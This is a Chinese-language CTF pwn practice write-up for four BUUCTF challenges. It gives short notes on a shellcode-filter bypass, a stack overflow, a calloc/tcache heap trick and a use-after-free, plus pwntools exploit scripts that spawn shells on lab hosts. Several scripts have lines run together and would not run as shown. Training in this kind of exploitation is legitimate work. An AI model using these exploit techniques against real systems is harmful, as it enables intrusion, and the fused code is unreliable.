PWN-PRACTICE-BUUCTF-27
- starctf_2019_babyshell
- picoctf_2018_buffer overflow 0
- gyctf_2020_signin
- bjdctf_2020_YDSneedGrirlfriend
starctf_2019_babyshell
用\x00绕过shellcode检测,call rdx 跳转过去执行汇编代码,一个\x00必执行失败
于是需要找一条机器码以\x00开始的汇编指令,参考:x86汇编语言杂记
from pwn import *
context.arch='amd64'
#context.log_level='debug'
#io=process('./starctf_2019_babyshell')
io=remote('node4.buuoj.cn',29263)
elf=ELF('./starctf_2019_babyshell')
shellcode='\x00\x42\x00'+asm(shellcraft.sh())
io.recvuntil('plz:\n')
io.sendline(shellcode)
io.interactive()
picoctf_2018_buffer overflow 0
signal函数设置11为目标信号,当程序访问无效地址时,便会触发信号,执行sigsegv_handler函数
vuln函数中存在栈溢出漏洞,覆盖返回地址为无效地址即可
gyctf_2020_signin
calloc分配chunk时,不会从tcache bin中分配,参考:gyctf_2020_signin:ubuntu18.04配合calloc产生的漏洞
# -*- coding:utf-8 -*-
from pwn import *
#io=process("./gyctf_2020_signin")
io=remote("node4.buuoj.cn",26888)
elf=ELF("./gyctf_2020_signin")
libc=ELF("./libc-2.27-18-x64.so")def add(index):io.sendlineafter("your choice?","1")io.sendlineafter("idx?\n",str(index))
def edit(index,content):io.sendlineafter("your choice?","2")io.sendlineafter("idx?\n",str(index))io.sendline(content)
def free(index):io.sendlineafter("your choice?","3")io.sendlineafter("idx?\n",str(index))
def backdoor():io.sendlineafter("your choice?","6")ptr=0x4040C0for i in range(8):add(i)
for i in range(8):free(i)
add(8)
edit(7,p64(ptr-0x10))
backdoor()
io.interactive()
bjdctf_2020_YDSneedGrirlfriend
UAF,参考:bjdctf_2020_YDSneedGrirlfriend
# -*- coding:utf-8 -*-
from pwn import *
#io=process("./bjdctf_2020_YDSneedGrirlfriend")
io=remote("node4.buuoj.cn",25051)
elf=ELF("./bjdctf_2020_YDSneedGrirlfriend")
libc=ELF("./libc-2.23.so")def add(name_size,name):io.sendlineafter("Your choice :","1")io.sendlineafter("Her name size is :",str(name_size))io.sendlineafter("Her name is :",name)
def free(index):io.sendlineafter("Your choice :","2")io.sendlineafter("Index :",str(index))
def show(index):io.sendlineafter("Your choice :","3")io.sendlineafter("Index :",str(index))
def exit():io.sendlineafter("Your choice :","4")backdoor=0x400B9C#gdb.attach(io)
#pause()add(0x10,"aaaa")#0
add(0x10,"bbbb")#1#pause()free(0)#pause()free(0)#pause()add(0x20,"cccc")#pause()add(0x10,p64(backdoor))#pause()show(0)io.interactive()
